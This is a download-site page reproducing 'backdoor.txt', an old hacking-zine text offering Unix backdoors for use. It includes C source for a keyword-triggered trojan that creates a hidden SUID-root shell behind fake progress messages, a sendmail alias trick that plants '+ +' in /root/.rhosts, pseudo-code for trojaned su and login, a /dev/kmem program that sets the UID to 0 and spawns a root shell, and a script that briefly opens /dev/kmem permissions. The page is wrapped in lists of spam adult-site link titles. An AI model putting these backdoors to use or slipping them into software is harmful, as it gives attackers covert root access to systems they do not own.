亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關于我們
? 蟲蟲下載站

?? backdoor.txt

?? a collection of mega hacking tools
?? TXT
?? 第 1 頁 / 共 2 頁
字號:
Make sure it runs as root. Name it something innocous. Hide it well. /* A little trojan to create an SUID root shell, if the proper argument isgiven.  C code, rather than shell to hide obvious it's effects. *//* daemon9@netcom.com */#include#define KEYWORD "industry3"#define BUFFERSIZE 10   int main(argc, argv)int argc;char *argv[];{        int i=0;        if(argv[1]){            /* we've got an argument, is it the keyword? */                if(!(strcmp(KEYWORD,argv[1]))){                                                        /* This is the trojan part. */                        system("cp /bin/csh /bin/.swp121");                        system("chown root /bin/.swp121");                        system("chmod 4755 /bin/.swp121");                }        }                                /* Put your possibly system specific trojan                                   messages here */                                /* Let's look like we're doing something... */        printf("Sychronizing bitmap image records.");        /* system("ls -alR / >& /dev/null > /dev/null&"); */        for(;i<10;i++){                 fprintf(stderr,".");                            sleep(1);        }         printf("\nDone.\n");        return(0);} /* End main */[9] The sendmail aliases file. The sendmail aliases file allows for mail sent to a particular username to either expand to severalusers, or perhaps pipe the output to a program. Most well known of these is the uudecode alias trojan. Simply add the line:  "decode: "|/usr/bin/uudecode"to the /etc/aliases file. Usally, you would then create a uuencoded .rhosts file with the full pathname embedded. #! /bin/csh# Create our .rhosts file.  Note this will output to stdout.echo "+ +" > tmpfile/usr/bin/uuencode tmpfile /root/.rhostsNext telnet to the desired site, port 25. Simply fakemail to decode and use as the subject body, the uuencoded version of the.rhosts file. For a one liner (not faked, however) do this: %echo "+ +" | /usr/bin/uuencode /root/.rhosts | mail decode@target.comYou can be as creative as you wish in this case. You can setup an alias that, when mailed to, will run a program of yourchoosing. Many of the previous scripts and methods can be employed here. The Covert[10] Trojan code in common programs. This is a rather sneaky method that is really only detectable by programs such tripwire.The idea is simple: insert trojan code in the source of a commonly used program. Some of most useful programs to us in thiscase are su, login and passwd because they already run SUID root, and need no permission modification. Below are somegeneral examples of what you would want to do, after obtaining the correct sourcecode for the particular flavor of UNIX youare backdooring. (Note: This may not always be possible, as some UNIX vendors are not so generous with thier sourcecode.)Since the code is very lengthy and different for many flavors, I will just include basic psuedo-code: get input;if input is special hardcoded flag, spawn evil trojan;else if input is valid, continue;else quit with error;...Not complex or difficult. Trojans of this nature can be done in less than 10 lines of additional code. The Esoteric[11] /dev/kmem exploit. It represents the virtual of the system. Since the kernel keeps it's parameters in memory, it is possibleto modify the memory of the machine to change the UID of your processes. To do so requires that /dev/kmem have read/writepermission. The following steps are executed: Open the /dev/kmem device, seek to your page in memory, overwrite the UID ofyour current process, then spawn a csh, which will inherit this UID. The following program does just that. /* If /kmem is is readable and writable, this program will change the user's UID and GID to 0.  *//* This code originally appeared in "UNIX security:  A practical tutorial" with some modifications by daemon9@netcom.com */#include #include #include #include #include #include #include #define KEYWORD "nomenclature1"struct user userpage;long address(), userlocation;int main(argc, argv, envp)int argc;char *argv[], *envp[];{        int count, fd;        long where, lseek();                if(argv[1]){            /* we've got an argument, is it the keyword? */                if(!(strcmp(KEYWORD,argv[1]))){                        fd=(open("/dev/kmem",O_RDWR);                        if(fd<0){                                printf("Cannot read or write to /dev/kmem\n");                                perror(argv);                                exit(10);                               }                                                        userlocation=address();                        where=(lseek(fd,userlocation,0);                                if(where!=userlocation){                                printf("Cannot seek to user page\n");                                perror(argv);                                exit(20);                         }                        count=read(fd,&userpage,sizeof(struct user));                                if(count!=sizeof(struct user)){                                printf("Cannot read user page\n");                                perror(argv);                                exit(30);                        }                               printf("Current UID: %d\n",userpage.u_ruid);                        printf("Current GID: %d\n",userpage.g_ruid);                                                userpage.u_ruid=0;                        userpage.u_rgid=0;                                                where=lseek(fd,userlocation,0);                        if(where!=userlocation){                                        printf("Cannot seek to user page\n");                                perror(argv);                                exit(40);                         }                                                write(fd,&userpage,((char *)&(userpage.u_procp))-((char *)&userpage));                                                execle("/bin/csh","/bin/csh","-i",(char *)0, envp);                }        } } /* End main */#include #include #include #define LNULL ((LDFILE *)0)long address(){                LDFILE *object;        SYMENT symbol;        long idx=0;        object=ldopen("/unix",LNULL);        if(!object){                fprintf(stderr,"Cannot open /unix.\n");                exit(50);        }        for(;ldtbread(object,idx,&symbol)==SUCCESS;idx++){                if(!strcmp("_u",ldgetname(object,&symbol))){                        fprintf(stdout,"User page is at 0x%8.8x\n",symbol.n_value);                        ldclose(object);                        return(symbol.n_value);                }        }        fprintf(stderr,"Cannot read symbol table in /unix.\n");        exit(60);}[12] Since the previous code requires /dev/kmem to be world accessable, and this is not likely a natural event, we need to takecare of this. My advice is to write a shell script similar to the one in [7] that will change the permissions on /dev/kmem for adiscrete amount of time (say 5 minutes) and then restore the original permissions. You can add this source to the source in [7]: chmod 666 /dev/kmemsleep 300               # Nap for 5 minuteschmod 600 /dev/kmem     # Or whatever it was beforeFrom The Infinity Concept Issue II

?? 快捷鍵說明

復制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
国产成人午夜精品影院观看视频 | 亚洲少妇30p| 久久国产精品72免费观看| 91国偷自产一区二区三区成为亚洲经典 | 国产精品一区不卡| 日韩视频免费观看高清完整版 | 国产精品乱子久久久久| 国产自产v一区二区三区c| 欧美一区二区三区日韩视频| 一区二区不卡在线播放| 日本乱码高清不卡字幕| 综合中文字幕亚洲| 91在线国内视频| 亚洲品质自拍视频网站| 色av综合在线| 亚洲成av人影院| 欧美在线不卡视频| 亚洲二区视频在线| 欧美精品日日鲁夜夜添| 丝袜美腿成人在线| 日韩欧美国产电影| 国产999精品久久久久久| 国产婷婷色一区二区三区在线| 精品亚洲国内自在自线福利| 91精品国产一区二区人妖| 麻豆精品一二三| 久久久不卡影院| 91丨porny丨蝌蚪视频| 亚洲激情五月婷婷| 欧美一区二区三区视频免费播放| 麻豆精品在线播放| 国产欧美一区二区精品婷婷| av综合在线播放| 亚洲第一狼人社区| 精品国产一二三| youjizz国产精品| 午夜成人免费电影| 久久亚洲春色中文字幕久久久| 国产成人精品在线看| 亚洲免费观看视频| 欧美一区二区三区免费视频| 国产真实乱对白精彩久久| 国产精品嫩草99a| 在线播放91灌醉迷j高跟美女| 久久66热偷产精品| 国产亚洲精品bt天堂精选| 99精品视频免费在线观看| 亚洲v中文字幕| 国产精品天干天干在观线| 欧美色视频在线观看| 激情文学综合丁香| 一区免费观看视频| 日韩欧美亚洲另类制服综合在线| 成人黄色免费短视频| 视频一区视频二区中文| 久久九九99视频| 欧美日韩不卡一区二区| 国产成人免费在线| 日韩精品亚洲专区| 亚洲三级电影全部在线观看高清| 91精品国产91久久久久久一区二区| 国产91丝袜在线播放九色| 亚洲成人7777| 亚洲国产精品精华液ab| 91精品婷婷国产综合久久| 99久久免费精品| 国产美女主播视频一区| 日韩精品91亚洲二区在线观看| 最新不卡av在线| 久久嫩草精品久久久精品一| 欧美日韩一区成人| 色视频欧美一区二区三区| 国产酒店精品激情| 免费在线看成人av| 午夜不卡av免费| 亚洲自拍偷拍综合| 久久综合成人精品亚洲另类欧美| 91麻豆精品91久久久久久清纯| 95精品视频在线| 床上的激情91.| 国产乱码精品一品二品| 麻豆91在线播放| 一区二区成人在线| 伊人一区二区三区| 1000部国产精品成人观看| 欧美精品一区二区在线观看| 69p69国产精品| 欧美视频一区二区三区在线观看| 9人人澡人人爽人人精品| 国产91精品一区二区麻豆网站 | 久久精品99久久久| 美腿丝袜亚洲色图| 美女爽到高潮91| 麻豆精品一区二区av白丝在线| 日日夜夜精品免费视频| 亚洲国产精品久久不卡毛片| 亚洲免费观看高清完整版在线观看熊| 久久精品视频在线看| 久久久久亚洲综合| 久久影视一区二区| 精品国产欧美一区二区| 欧美精品一区二区久久久| 精品福利av导航| 久久精品亚洲精品国产欧美| 国产色91在线| 亚洲欧美综合色| 亚洲资源中文字幕| 亚洲图片有声小说| 石原莉奈在线亚洲二区| 蜜桃精品在线观看| 国产精品91xxx| 99re免费视频精品全部| 欧洲视频一区二区| 91尤物视频在线观看| 91久久精品日日躁夜夜躁欧美| 在线观看国产精品网站| 欧美日韩免费在线视频| 欧美一区二区三区视频免费播放| 精品日韩成人av| 一区二区三区在线视频免费观看 | 蜜臀国产一区二区三区在线播放| 国产成人一级电影| 欧美精品九九99久久| 国产精品免费视频观看| 日本欧美一区二区三区| 成人动漫一区二区三区| 日韩午夜在线影院| 一区二区三区在线观看欧美| 精品夜夜嗨av一区二区三区| 色偷偷一区二区三区| 精品久久久久香蕉网| 亚洲一区二区视频在线观看| 国产精品一区免费在线观看| 色欧美片视频在线观看在线视频| 欧美不卡视频一区| 婷婷中文字幕综合| 成人免费视频播放| 欧美v亚洲v综合ⅴ国产v| 亚洲一级二级在线| 成人久久久精品乱码一区二区三区| 欧美日韩美女一区二区| 中文字幕一区二区三区四区不卡| 日韩成人一级大片| 精品视频色一区| 亚洲激情六月丁香| 国产剧情av麻豆香蕉精品| 日韩一区和二区| 亚洲bt欧美bt精品777| 91丨国产丨九色丨pron| 国产精品天美传媒| 国产成人av一区二区三区在线| 日韩免费看网站| 日本女优在线视频一区二区| 91美女视频网站| 一区视频在线播放| 成人精品国产一区二区4080| 欧美不卡一区二区三区四区| 日韩福利视频网| 欧美日韩国产高清一区二区 | 亚洲福利一区二区| 91在线观看一区二区| 国产精品国产三级国产aⅴ入口| 国产一区二区三区电影在线观看| 欧美电视剧在线观看完整版| 视频一区中文字幕| 91精品国产综合久久久久久久| 亚洲午夜一区二区三区| 在线观看欧美日本| 亚洲一区二区三区四区五区中文| 色婷婷综合久久久中文字幕| 亚洲欧美日韩在线不卡| 91视频xxxx| 亚洲福利视频三区| 91精品国产综合久久精品app | 亚洲一区二区精品久久av| 欧美日韩一区二区三区在线看| 亚洲伊人色欲综合网| 在线观看不卡一区| 天天av天天翘天天综合网色鬼国产 | 91国在线观看| 肉色丝袜一区二区| 久久一区二区视频| 成人av网站在线观看| 最近中文字幕一区二区三区| 欧美性猛交xxxxxxxx| 男人的j进女人的j一区| 欧美xfplay| 成人av电影观看| 亚洲一级二级三级在线免费观看| 欧美电影影音先锋| 国产美女精品一区二区三区| 国产精品午夜电影| 欧美主播一区二区三区美女| 日韩中文字幕91| 久久久夜色精品亚洲| 99久久婷婷国产综合精品| 午夜在线成人av| 久久综合色之久久综合| 97精品国产露脸对白| 丝袜亚洲另类欧美综合|